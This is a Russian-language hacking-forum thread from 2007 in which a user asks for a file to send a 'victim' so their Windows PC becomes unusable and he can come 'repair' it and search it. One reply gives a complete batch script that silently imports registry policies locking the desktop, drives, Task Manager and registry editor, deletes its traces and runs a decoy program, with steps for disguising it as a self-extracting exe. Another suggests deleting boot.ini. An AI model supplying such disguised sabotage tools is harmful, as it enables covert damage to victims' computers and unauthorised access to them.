Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Отключить комп до моего прихода (https://forum.antichat.xyz/showthread.php?t=55784)

Debian 14.12.2007 18:03

Отключить комп до моего прихода
 
Уважаемые мастера, задача такова:

Есть компьютер с Win толи Home толи XP , нужно спомощью файла ( мб bat ) котрый я передам на компьютер жертвы, временно устранить работу компьютера, т.е. Я кидаю файл, человек его открыват, дальше сидит делает свои дела, на ночь выключает, утром включат а он у него не пашет... :D , потом он звонит мне и просит приехать в общем нужно чтобы компьютер до моего приезда невозможно было включить...что то вроде погружения в автозагрузку .... и желательно узнать бы как привести его птом в рабочее состояние) :cool:

Кто нибудь может что нибудь подсказать?

-=lebed=- 14.12.2007 18:08

сменить пасс админский через смd-файл
Код:

NET USER
[имя_пользователя [пароль | *] [параметры]] [/DOMAIN]
        имя_пользователя {пароль | *} /ADD [параметры] [/DOMAIN]
        имя_пользователя [/DELETE] [/DOMAIN]


Debian 14.12.2007 19:12

не не...Вы не поняли, Мне нужно чтобы он был как вирус, кинул его жертве, она запустила...а комп врубить не может , но чтобы без повреждений )

ToniKapuchon 14.12.2007 19:45

Пока тока идея.... если буд время напишу... В автозагрузку кидается exeшник... который выкидывает мессагбох типа отсутствуют системные файлы.... и через 30 сек перезагрузка винды... и так по кругу.... потом коммандером заходишь exe c автозагрузки удаляешь и вуаля всё работает....

guest3297 14.12.2007 19:52

Цитата:

Отключить комп до моего прихода
Желаю долгих и счаливых приходов. =)))

ArmageddonPro 14.12.2007 19:55

Цитата:

Сообщение от Debian
не не...Вы не поняли, Мне нужно чтобы он был как вирус, кинул его жертве, она запустила...а комп врубить не может , но чтобы без повреждений )

Если компьютер будет врубаься, но после перезагрузки на рабочем столе ничего нельзя будет сделать и не будет пункта "программы" в пуске . Такое устроит?

Debian 14.12.2007 19:57

Цитата:

Сообщение от ArmageddonPro
Если компьютер будет врубаься, но после перезагрузки на рабочем столе ничего нельзя будет сделать и не будет пункта "программы" в пуске . Такое устроит?


а как это можно будет потом исправить?=) просто я получу доступ к компу для того чтобы как раз восстановить его :D , и в итоге найду то что нужно)

Debian 14.12.2007 19:58

Цитата:

Сообщение от ToniKapuchon
Пока тока идея.... если буд время напишу... В автозагрузку кидается exeшник... который выкидывает мессагбох типа отсутствуют системные файлы.... и через 30 сек перезагрузка винды... и так по кругу.... потом коммандером заходишь exe c автозагрузки удаляешь и вуаля всё работает....


Будем ждать с нетерпением))

ArmageddonPro 14.12.2007 19:58

Цитата:

Сообщение от Debian
а как это можно будет потом исправить?=) просто я получу доступ к компу для того чтобы как раз восстановить его :D , и в итоге найду то что нужно)

Я дам тебе "таблетку". Так устроит?

Debian 14.12.2007 20:00

Цитата:

Сообщение от ArmageddonPro
Я дам тебе "таблетку". Так устроит?


вполне))

ArmageddonPro 14.12.2007 20:02

Цитата:

Сообщение от Debian
вполне))

Завтра приготовлю. Дело в том, что мне тоже нужно такое, потому жди ответа в форуме.
Работать будет в ХР и ниже, проблемы могут возникнуть с 7м каспером.

tclover 14.12.2007 20:02

приходы это да. Ты витамины для программистов кушай почаще.

Debian 14.12.2007 20:05

Цитата:

Сообщение от ArmageddonPro
Завтра приготовлю. Дело в том, что мне тоже нужно такое, потому жди ответа в форуме.
Работать будет в ХР и ниже, проблемы могут возникнуть с 7м каспером.

Хорошо) Там не каспер стоит)

Debian 15.12.2007 12:46

такой вот вопрос , реально ли зделать батовский файл который погрузица в автозагрузку , и будет при включении компа выписывать в командной строке shutdown -s ? т.е. отключение питания..)

guest3297 15.12.2007 12:50

реально.

Debian 15.12.2007 12:53

м..а каков этот код?) если конечно не трудно подсказать)

guest3297 15.12.2007 12:56

создаешь поменщаеш в автозагрузку.

Debian 15.12.2007 12:58

ты не понял, нужно чтобы при запуске он автоматически сам туда погрузился)

Sn@k3 15.12.2007 15:10

Цитата:

Сообщение от Debian
Отключить комп до моего прихода

Фильмов насмотрелся =\

а что тебе мешает нагнуться и вкл кнопку? =\

ArmageddonPro 15.12.2007 19:41

Итак! Как и обещал выкладываю свою реализацию.
Итак! Как и обещал, выкладываю свою реализацию.
Теория.
Какой должна быть наша программа?
1. Лёгкое и доступное написание;
2. Должна усложнять работу жертвы до прихода заказчика;
3. Не должна вызывать подозрений;
4. Должна запускаться как обычное приложение (двумя кликами грызуна);
5. Лёгкое обезвреживание.

---1---
Запускаться по клику мышки могут 4 типа фалов: *.exe, *.com, *.scr, *.bat. Из всех приведённых форматов только *.bat позволяет не прибегать к установке сторонних приложений для своего создания, обычного блокнота будет достаточно! Кроме того *.bat файлы позволяют создавать текстовые файлы с любыми разрешениями. Мы знаем, что файлы реестра имеют текстовый формат. Делаем вывод: *.bat способен создавать файлы реестра Windows. Но это ещё не всё! Bat позволяет запускать *.reg-файлы и без вопросов добавлять их информацию в реестр. Этим собственно и займёмся. Имя нашего батника будет reestr.bat.
Допустим нам нужно создать файл reestr.reg с данными Windows Registry Editor Version 5.00 и записать его в корневой каталог диска C:\, тогда наш reestr.bat будет содержать такую строку: echo Windows Registry Editor Version 5.00 > C:\reestr.reg. Для добавления последующих строк будем использовать вместо > знак >>. Таким образом, мы создаём необходимый код для добавления в реестр.
---2---
Некоторые параметры реестра отвечают за работу интерфейса ОС, их мы и будем рассматривать.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
DWORD DisableTaskMgr, значение 1 - запрещает вызов диспетчера задач
DWORD DisableRegistryTools, значение 1 - запрещает вызов редактора реестра
DWORD NoDispBackgroundPage, значение 1 - скрыть вкладку

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
DWORD NoControlPanel, значение 1 - запрещает запуск апплетов в Панели управления
DWORD NoViewOnDrive, значение сумма "значений дисков". Значение 0 - разрешен доступ ко всем дискам, значение 67108863 (hex:3ffffff) - запретить доступ ко всем дискам (A: - Z:)
Значения дисков:
A: - 1 (2^0)
B: - 2 (2^1)
C: - 4 (2^2)
D: - 8 (2^3)
...
Z:- 33554432 (2^25)

Чтобы запретить доступ к дискам A и D необходимо сложить 1 + 8 = 9.
DWORD NoSetTaskbar, значение 1 - свойства Панели задачи меню Пуск не доступны
DWORD NoChangeStartMenu, значение 1 - запрещает модификацию меню Пуск
DWORD NoStartMenuMorePrograms, значение 1 - убирает подменю Все программы
DWORD NoRecentDocsMenu, значение 1 - убирает пункт меню Недавние документы
DWORD NoTrayContextMenu, значение 1 - запрещает контекстное меню.
DWORD NoDesktop, значение 1 - запрещает рабочий стол
---3---
Создать файл реестра с данными параметрами, ещё полдела, нужно, чтобы он незаметно добавился. Поэтому пишем regedit /S C:\reestr.reg, где /S - добавляет данные в реестр без лишних вопросов.
Заметаем следы del C:\reestr.reg.
---4---
Итак, данные мы добавили, следы замели. Остаётся сделать наше творение обычным приложением, то есть перевести её в *.exe формат и заставить, что-то запускать, кроме того, она должна иметь иконку, а как же иначе?
Делается это всё очень просто: во-первых, нам нужно выполнять какую-то программу из-под нашего батника, тогда пишем путь к нашей прожке и одновременно запускаем её @start /MAX C:\Progra~1\SmallFish\Beyond.exe. Как вы поняли, исполняемая батником программа будет называться Beyond.exe. Beyond.exe – это любая программа, которую вы хотите запуститься на чужом компе, чтобы показать, что-нибудь пользователю в качестве отвлечения. Не хорошо же предлагать людям нерабочую программу, а с эти Beyond.exe всё будет работать и не вызовет подозрений ;)
Полный код файла reestr.bat:
Код:

@echo off
echo Windows Registry Editor Version 5.00 > C:\reestr.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]  >> C:\reestr.reg
echo "NoSetTaskbar"=dword:00000001  >> C:\reestr.reg
echo "NoDesktop"=dword:00000001  >> C:\reestr.reg
echo "NoChangeStartMenu"=dword:00000001  >> C:\reestr.reg
echo "NoStartMenuMorePrograms"=dword:00000001  >> C:\reestr.reg
echo "NoRecentDocsMenu"=dword:00000001  >> C:\reestr.reg
echo "NoSetFolders"=dword:00000001  >> C:\reestr.reg
echo "NoTrayContextMenu"=dword:00000001  >> C:\reestr.reg
echo "NoControlPanel"=dword:00000001  >> C:\reestr.reg
echo "NoDrives"=dword:00000004  >> C:\reestr.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  >> C:\reestr.reg
echo "NoDispBackgroundPage"=dword:00000001  >> C:\reestr.reg
echo "DisableTaskMgr"=dword:00000001  >> C:\reestr.reg
echo "DisableRegistryTools"=dword:00000001  >> C:\reestr.reg
regedit /s C:\reestr.reg
del C:\reestr.reg
@start /MAX C:\ Progra~1\SmallFish\Beyond.exe
EXIT

Сейчас вы зададите вопрос: а откуда же возьмётся Beyond.exe да ещё и в несуществующей папке C:\ Progra~1\SmallFish\Beyond.exe? А вот тут уже нам понадобится обычный архиватор WinRAR!
Берём два файла: а) наш, готовый батник; б) Программу-заставку - Beyond.exe.
Далее создаём SFX-архив.
[IMG]http://photofile.ru/cphoto/armageddo...d11bfae8d91a73 [/IMG]
Во вкладке «Дополнительно» выбираем «параметры SFX»
http://photofile.ru/cphoto/armageddo...d11bfae8d91a73
Cтавим абсолютный путь для распаковки C:\Progra~1\SmallFishes/ . Устанавливаем галку «сохранять и восстанавливать пути». В пункте «выполнить после распаковки:» пишем "C:\Progra~1\SmallFishes\reestr.bat"
http://photofile.ru/cphoto/armageddo...d11bfae8d91a73
Далее лезем во вкладку «режимы» и настраиваем как на рисунке
http://photofile.ru/cphoto/armageddo...d11bfae8d91a73
И последний штрих. Нужно назначить иконку. Вкладка «текст и значок» как раз для этих целей.
http://photofile.ru/cphoto/armageddo...d11bfae8d91a73

Собственно программа готова.
---5---
Теперь напишем файл SDN.bat для обезвреживания:
Код:

echo Windows Registry Editor Version 5.00 > C:\reestr.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]  >> C:\reestr.reg
echo "NoSetTaskbar"=dword:00000000  >> C:\reestr.reg
echo "NoDesktop"=dword:00000000  >> C:\reestr.reg
echo "NoChangeStartMenu"=dword:00000000  >> C:\reestr.reg
echo "NoStartMenuMorePrograms"=dword:00000000  >> C:\reestr.reg
echo "NoRecentDocsMenu"=dword:00000000  >> C:\reestr.reg
echo "NoSetFolders"=dword:00000000  >> C:\reestr.reg
echo "NoTrayContextMenu"=dword:00000000  >> C:\reestr.reg
echo "NoControlPanel"=dword:00000000  >> C:\reestr.reg
echo "NoDrives"=dword:00000000  >> C:\reestr.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  >> C:\reestr.reg
echo "NoDispBackgroundPage"=dword:00000000  >> C:\reestr.reg
echo "DisableTaskMgr"=dword:00000000  >> C:\reestr.reg
echo "DisableRegistryTools"=dword:00000000  >> C:\reestr.reg
regedit /s C:\reestr.reg

PS: поскольку очень многое стало закрытым, то для того, чтобы вернуть всё обратно нам понадобится зайти Пуск-->Выполнить, вписать explorer найти и выполнить sdn.bat. После перезагрузки винда будет как новая
Если кому нужен готовый вариант пишите на мыло armageddon(злая собака)mail.ru

ArmageddonPro 15.12.2007 19:42

Чуть позже отредактирую, рисунки не влезли

Debian 15.12.2007 20:48

Цитата:

Сообщение от Sn@k3
Фильмов насмотрелся =\

а что тебе мешает нагнуться и вкл кнопку? =\


читай внимательно и все поймешь, если прочел название темы еще не значит что ты ниибаца умный...
говорил о том что комп должен отключица НЕ у меня!!!

smOleg 26.12.2007 20:33

помоему додумаца вписать в смд експлорер сможет любой ламер.

Хотя если блондинка то может сработать

ArmageddonPro 26.12.2007 20:48

Цитата:

Сообщение от smOleg
помоему додумаца вписать в смд експлорер сможет любой ламер.

Хотя если блондинка то может сработать

вот только, если скрыть в проводнике все диски, то от эксплорера толку мало :)

ground_zero 26.12.2007 22:41

что блокнот универсальный редактор для меня также ново как и для вас ... bat инициирует , копирует , запускает reg файлы я ошеломлён ... пацаны вы сделали открытие !!! незабудте про меня на вручении нобелевской премии мне много ненадо: Ethernet модем , 2 бутылки шампанскова и букет цветов для девушки .

tolstik 26.12.2007 23:05

Цитата:

Сообщение от ArmageddonPro
Запускаться по клику мышки могут 4 типа фалов: *.exe, *.com, *.scr, *.bat. Из всех приведённых форматов только *.bat позволяет не прибегать к установке сторонних приложений для своего создания, обычного блокнота будет достаточно!

запускать одним кликом можно намного файлов )
блин а чем не устраивает
del C:\boot.ini
идеально подходит легко востановить и не одна блонди не разбереться

ArmageddonPro 26.12.2007 23:58

Цитата:

Сообщение от tolstik
запускать одним кликом можно намного файлов )
блин а чем не устраивает
del C:\boot.ini
идеально подходит легко востановить и не одна блонди не разбереться

А тем, что без этого файла с загрузочного диска всё равно будет грузится, лишь выдаст ошибку .что не нашла пути агрузки и всё. Правда перестанут грузиться второстепенные ОС, то есть с других логических дисков, если такие имеют место.
PS: согласен, что больше фалов запускается, я срау и не вспомнил: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH - вроде так

ArmageddonPro 27.12.2007 00:06

Цитата:

Сообщение от ground_zero
что блокнот универсальный редактор для меня также ново как и для вас ... bat инициирует , копирует , запускает reg файлы я ошеломлён ... пацаны вы сделали открытие !!! незабудте про меня на вручении нобелевской премии мне много ненадо: Ethernet модем , 2 бутылки шампанскова и букет цветов для девушки .

Он не универсальный,этого никто не говорил, просто он доступен для определённых целей. Просто мы показали как только блокноту и архиватору WinRar сделать рабочий ехе файл, наделённый необходимыми нам функциями и не вызывающий подозрений.
На форуме не все владеют знаниями программирования, а приведённые способы позволяют с чего-то начать вместо того, чтобы кричать помогите сделать то-то, что можно сделать самому.


Время: 00:33